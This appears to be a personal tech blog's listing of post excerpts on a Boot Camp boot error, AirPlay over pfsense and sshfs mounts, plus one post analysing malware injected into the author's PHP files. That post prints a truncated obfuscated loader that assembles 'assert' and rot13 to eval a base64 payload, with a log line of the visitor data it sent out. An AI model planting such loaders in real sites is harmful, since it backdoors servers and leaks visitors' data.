Fix INACCESSIBLE_BOOT_DEVICE with Boot Camp Windows Systems

December 19, 2019December 19, 2019 Doc

Like any self-respecting computer geek, I like everything. I typically run-up Windows on my Macs by installing it via Boot Camp, and then booting it as a VM. This lets me run everything in parallel, but also go full native mode when needed.

Recently, I found I couldn’t boot my Windows natively any more, though it would still work fine in my VMware Fusion. When booting natively, my Windows install with BSOD on an INACCESSIBLE_BOOT_DEVICE exception. After a bit of googling, I found that this was likely related to storage drivers. I ultimately managed to fix my Windows environment (without a reinstall), here are the steps:

Battle against injected PHP

November 13, 2016November 13, 2016 Doc

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.

AirPlay Through pfsense Bridge

December 23, 2010 Doc

Howdy all, geek-mode enabled.

So I’ve been fighting somewhat to get my AirPlay enabled device (Apple TV) to function perfectly. I use pfsense to run my router and in so doing I’ve got a Wireless and Wired network that are bridged together. I found with the AppleTV that only devices on the same physical media could stream to it, though all devices could “see” it.

Ubuntu 9.10 remote mounts via sshfs

February 7, 2010 Doc2 Comments

Hey just a fast post here.. I’ve been using sshfs on Ubuntu (meh, linux in general) for awhile as a means of securely remotely accessing my files. I’ve taken some steps to add a line to my /etc/fstab file to make this run smoothly…

Though today I ran in to a really weird situation. I found that despite having a uid=xxxx line, the appropriate user wasn’t getting ownership of the mount. In fact, when that user would look at the permissions for the mount, it returned something like “d???? ? ? ?”. Whisky Tango Foxtrot.

Well, turned out the problem was a result of how I had my fstab arranged.